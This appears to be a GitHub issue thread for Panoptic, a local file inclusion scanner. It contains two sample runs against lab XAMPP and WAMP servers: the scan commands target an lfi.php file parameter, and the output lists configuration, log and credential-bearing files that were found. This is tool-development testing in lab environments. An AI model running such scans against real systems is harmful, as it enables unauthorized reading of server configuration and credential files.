Check tool against non-LAMP platforms

Question

Check tool against non-LAMP platforms

stamparm opened this issue 12 years ago · 2 comments

Answer 1 · 2013-04-19T14:26:18.000Z

Sample run against XAMPP:

python panoptic.py -u "http://192.168.21.129/test_environment/mysql/lfi.php?file=1" --ignore-proxy

 .-',--.`-.
<_ | () | _>
  `-`=='-'

Panoptic v0.1-d038179 (https://github.com/lightos/Panoptic/)

[i] Starting scan at: 16:22:32

[i] Checking original response...
[i] Checking invalid response...
[i] Done!
[i] Searching for files...
[i] Possible file(s) found!
[i] OS: Windows
[?] Do you want to restrict further scans to 'Windows'? [Y/n] 
[+] Found '/xampp/apache/logs/access.log' (Windows/Packaged Web Dev/log)
[+] Found '/xampp/apache/logs/error.log' (Windows/Packaged Web Dev/log)
[+] Found '/xampp/mysql/data/mysql.err' (Windows/Packaged Web Dev/log)
[+] Found '/xampp/apache/conf/httpd.conf' (Windows/Packaged Web Dev/conf)
[+] Found '/xampp/FileZillaFTP/FileZilla Server.xml' (Windows/Packaged Web Dev/conf)
[+] Found '/xampp/MercuryMail/mercury.ini' (Windows/Packaged Web Dev/conf)
[+] Found '/xampp/sendmail/sendmail.ini' (Windows/Packaged Web Dev/conf)
[+] Found '/xampp/webalizer/webalizer.conf' (Windows/Packaged Web Dev/conf)
[+] Found '/boot.ini' (Windows/Win NT/conf)

[i] File search complete.

[i] Finishing scan at: 16:22:36

Answer 2 · 2013-04-22T00:58:18.000Z

Sample run against WAMP:

root@bt:~/Panoptic# python panoptic.py -u "http://192.168.1.202/lfi.php?file=x" --software WAMP

 .-',--.`-.
<_ | () | _>
  `-`=='-'

Panoptic v0.1-edda686 (https://github.com/lightos/Panoptic/)

[i] Starting scan at: 20:20:35

[i] Checking original response...
[i] Checking invalid response...
[i] Done!
[i] Searching for files...
[i] Possible file(s) found!
[i] OS: Windows
[?] Do you want to restrict further scans to 'Windows'? [Y/n] 
[+] Found '/wamp/logs/access.log' (Windows/Packaged Web Dev/log)
[+] Found '/wamp/logs/apache_error.log' (Windows/Packaged Web Dev/log)
[+] Found '/wamp/logs/genquery.log' (Windows/Packaged Web Dev/log)
[+] Found '/wamp/logs/mysql.log' (Windows/Packaged Web Dev/log)
[+] Found '/wamp/logs/slowquery.log' (Windows/Packaged Web Dev/log)
[+] Found '/wamp/bin/mysql/mysql5.5.16/data/mysql-bin.index' (Windows/Packaged Web Dev/log)
[+] Found '/wamp/bin/mysql/mysql5.5.16/data/mysql-bin.000096' (Windows/Databases/log)
[+] Found '/wamp/bin/apache/apache2.2.21/conf/httpd.conf' (Windows/Packaged Web Dev/conf)
[+] Found '/wamp/bin/mysql/mysql5.5.16/my.ini' (Windows/Packaged Web Dev/conf)
[+] Found '/wamp/bin/php/php5.3.8/php.ini' (Windows/Packaged Web Dev/conf)

[i] File search complete.

[i] Finishing scan at: 20:20:37

root@bt:~/Panoptic#